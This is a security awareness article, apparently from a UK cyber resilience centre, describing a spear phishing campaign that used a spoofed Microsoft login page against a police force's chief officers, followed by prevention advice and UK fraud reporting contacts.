To demonstrate that not even police forces are exempt from cyber criminality, an unnamed UK police force has been the subject of a spear phishing campaign.
Spear phishing is an email or electronic communications scam targeted towards a specific individual, organisation or business. Although often intended to steal data for malicious purposes, cybercriminals may also intend to install malware on a targeted user’s computer.
Typically, an email arrives, apparently from a trustworthy source, but instead it leads the unknowing recipient to a bogus website full of malware. These emails often use clever tactics to get the victim's attention.
In this particular campaign, the intended victims were chief officers within the force, and the emails contained potentially malicious attachments.
The attachment redirected the recipients to a Microsoft Office login page with the user’s email address displayed, prompting the user to enter a password as per the usual Microsoft login windows.
The emails were delivered between 09:00 and 10:00 hours on December 12 with the title “Westshire-pcc November Financial Report” (Westshire used here to hide the actual force name).
Attached to the email was a HTML file named Expense.Report providing the link to the malicious login page.
The link subsequently loaded a HTML page with what appeared to be a standard Microsoft login prompt with the users email address already entered and therefore prompting for just the password.
Prior to this login box being displayed there is also a fuzzy video displayed for an instant that gives the impression of an inbox within Outlook, presumably to give the impression of the user attempting to automatically login to a pre-existing open email account.
To add to the impression of the page being entirely genuine is the use of a background picture of the force headquarters behind the login page and the force crest and title within the login box.
All in all, the campaign was a very in-depth and extremely sophisticated spear phishing attempt to which a recipient could easily be tricked into falling foul of.
The efforts of the threat actors to craft this campaign could easily be adapted to suit other UK organisations with minimal time and effort.
Here are some common red flags of a spear phishing attempt:
Security awareness training is fundamental in preventing any type of phishing attack, especially when many users are working from home. The training is one of the services we offer at the EMCRC.
To prevent spear phishing attacks, organisations should:
Reporting
Report all Fraud and Cybercrime to Action Fraud by calling 0300 123 2040 or online. Forward suspicious emails to report@phishing.gov.uk. Report SMS scams by forwarding the original message to 7726 (spells SPAM on the keypad).
Click to Open Code Editor